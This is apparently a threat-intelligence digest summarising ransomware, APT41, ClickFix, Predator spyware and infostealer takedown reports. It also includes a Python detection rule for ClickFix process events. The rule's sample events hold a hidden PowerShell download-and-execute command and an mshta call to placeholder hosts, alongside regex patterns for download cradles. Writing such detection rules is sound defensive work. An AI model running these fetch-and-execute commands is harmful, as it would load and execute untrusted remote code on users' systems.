The Anubis ransomware-as-a-service (RaaS) has added a new file-wiping module, making data recovery impossible even after ransom payment. This destructive feature aims to pressure victims into quick payment and increases the threat level of Anubis attacks. #Anubis #Ransomware #DarkWeb
Tag: INITIAL ACCESS

Insikt Group uncovered new infrastructure and infection methods employed by GrayAlpha, a cybercriminal group overlapping with FIN7, including custom loaders PowerNet and MaskBat leading to NetSupport RAT infections. The report highlights three primary infection vectors and emphasizes the importance of application allow-lists, employee training, and updated detection rules to combat these threats. #GrayAlpha #FIN7 #NetSupportRAT #PowerNet #MaskBat

Ransomware groups have exploited a vulnerability in SimpleHelp remote device control software to target and disrupt utility billing software users. Federal agencies urge immediate patching, as this exploit has been linked to multiple ransomware strains and attacks on retail chains. #SimpleHelpVulnerability #CVE202457727…

Ransomware actors are exploiting unpatched SimpleHelp RMM instances to target utility billing software customers, emphasizing the need for updates and threat mitigation. The attack pattern highlights ongoing vulnerabilities exploited by groups like DragonForce and others, with mitigation strategies recommended by CISA. #SimpleHelp #DragonForce…

The recent Fog ransomware attack utilized legitimate and open-source tools typically linked to espionage, indicating a possible cyber-espionage motive. The attack targeted a financial institution in Asia and involved advanced lateral movement and data exfiltration techniques. #FogRansomware #APT41 #Syteca #GC2 #Stowaway…

Malicious open source packages targeting blockchain developers are increasingly used to steal cryptowallet credentials, drain funds, mine cryptocurrency, and hijack clipboard data. Threat actors, including nation-state groups, abuse public registries such as npm and PyPI as a supply-chain vector by publishing poisoned packages, impacting ecosystems such as Ethereum, Solana, TRON, and TON. #ContagiousInterview #BeaverTail #InvisibleFerret #XMRig #ClipboardHijackers

In May 2025, an unusual ransomware attack using the Fog ransomware targeted a financial institution in Asia, employing rare tools such as Syteca employee monitoring software and open-source pentesting utilities like GC2, Adaptix, and Stowaway. The attackers also established persistence on the network post-ransomware deployment, indicating possible espionage motives beyond typical ransomware objectives. #FogRansomware #Syteca #GC2 #Adaptix #Stowaway

Predator spyware operations continue despite sanctions and public exposure, with a resurgence noted including a new operator in Mozambique. The spyware’s infrastructure involves multi-tiered, evasive tactics linked to known Predator operators and a Czech entity associated with the Intellexa Consortium. #Predator #Intellexa #Mozambique
A collaborative effort among international cybersecurity agencies has resulted in comprehensive guidance to protect network edge devices and appliances. The guidance addresses vulnerabilities in devices like firewalls, routers, IoT devices, and OT systems, emphasizing mitigation strategies and secure deployment practices. #CISA #EdgeDevices #CyberThreats #FirewallVulnerabilities #IoTSecurity…

A cyberattack on Mooonux, a web development firm, led to the alleged theft and sale of its full database and server access. This breach affects not only Mooonux but also eight client websites, risking extensive sensitive data exposure. #Mooonux #FileZilla #DataLeak…

Over 20,000 malicious IP addresses linked to information stealers were taken down during INTERPOL’s Operation Secure, involving 26 countries. The operation resulted in the seizure of servers, arrests, and the disruption of cybercriminal infrastructure affecting victims across Asia. #Infostealers #OperationSecure

ClickFix is a social engineering technique that tricks end users into running attacker-supplied PowerShell commands, which the lure presents as routine verification steps, giving threat actors a foothold on the network from which to exfiltrate data. Since March 2024, various threat actors including APT28 and MuddyWater have leveraged this method to target multiple industries globally. #ClickFix #APT28 #MuddyWater
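Because a ClickFix victim pastes the command into the Run dialog or a console themselves, the resulting telemetry has a recognisable shape: explorer.exe spawning a script interpreter whose command line carries a download cradle, a hidden-window flag, or an encoded payload. The detection below is an added example written for this summary, not code from the original page or from any vendor report; the field names (`ParentImage`, `Image`, `CommandLine`) follow Sysmon Event ID 1 conventions and the sample events are constructed, so adapt the keys to your own log schema.

```python
"""Flag process-creation events that match the ClickFix pattern:
an interactive parent (explorer.exe) launching an interpreter with a
suspicious command line. Added example; events below are constructed."""
import re
from typing import Dict, List

# Interpreters a ClickFix lure typically instructs the victim to invoke.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "mshta.exe", "wscript.exe", "cscript.exe"}
# Script hosts that count as an indicator on their own when paired with a URL.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Parents that mean the command came from a user action (Run dialog,
# Explorer address bar) rather than a service, task or admin tool.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Each trait is scored separately so a single benign flag (a hidden window
# from a logon script, say) does not fire alone.
INDICATORS = {
    "hidden_window":   re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                                  r"downloadstring|curl|certutil)\b", re.I),
    "bypass_policy":   re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "remote_exec":     re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "url_argument":    re.compile(r"https?://", re.I),
}


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_indicators(event: Dict[str, str]) -> List[str]:
    """Return the indicator names matched by one process-creation event.

    Empty list when the parent/child pair is not the interactive
    user -> interpreter shape that ClickFix produces."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    if image not in INTERPRETERS or parent not in INTERACTIVE_PARENTS:
        return []
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if image in SCRIPT_HOSTS:
        hits.append("script_host")  # mshta/wscript + URL is a known ClickFix variant
    return hits


def is_clickfix_candidate(event: Dict[str, str], min_indicators: int = 2) -> bool:
    """True when at least min_indicators traits co-occur on one event."""
    return len(clickfix_indicators(event)) >= min_indicators


def scan(events: List[Dict[str, str]], min_indicators: int = 2) -> List[str]:
    """Return the RecordIds of events worth escalating."""
    return [e["RecordId"] for e in events if is_clickfix_candidate(e, min_indicators)]


# Constructed sample events (not real telemetry); hostnames are reserved
# .invalid names so nothing here resolves.
_EXPLORER = r"C:\Windows\explorer.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"RecordId": "1", "ParentImage": _EXPLORER, "Image": _PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/v.ps1 | iex"'},
    {"RecordId": "2", "ParentImage": _EXPLORER, "Image": _PS,
     "CommandLine": "powershell.exe"},                      # user opened a console
    {"RecordId": "3", "ParentImage": r"C:\Windows\System32\services.exe", "Image": _PS,
     "CommandLine": r"powershell -w hidden -ep bypass -File C:\scripts\login.ps1"},  # logon script
    {"RecordId": "4", "ParentImage": _EXPLORER, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["RecordId"], clickfix_indicators(ev))
    print("escalate:", scan(SAMPLE_EVENTS))
```

Record 3 carries the same hidden-window and bypass flags as record 1 but is ignored because its parent is services.exe, which is the point of keying on the interactive parent; record 4 shows the mshta variant, where a bare URL argument plus the script host is enough. Tune `min_indicators` and `INTERACTIVE_PARENTS` against your own baseline before alerting, and pair the rule with the RunMRU registry key if your endpoint agent collects it.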

Cybercriminals tied to the Black Basta ransomware operation are evolving their tactics, using email bombing, Teams phishing, and Python scripts to gain persistent access to networks. The threat landscape is shifting as former affiliates potentially migrate to other ransomware groups like CACTUS or BlackLock, while new malware and attack strategies emerge….

A global law enforcement operation successfully arrested suspects and dismantled thousands of malicious IPs linked to information-stealing malware. The crackdown targeted malware variants like Lumma, Risepro, and Meta, while alerting hundreds of thousands of victims about potential breaches. #Lumma #Risepro #Meta #Cybercrime #Infostealer…

MISSION2025, also known as APT41, is a Chinese state-sponsored threat group active since 2012, focusing on cyberespionage and financially motivated attacks aligned with China’s strategic goals. Their recent campaigns feature sophisticated use of cloud services for command and control and exploitation of software vulnerabilities to target governments and critical infrastructure globally. #MISSION2025 #APT41 #TOUGHPROGRESS #IvantiEPMM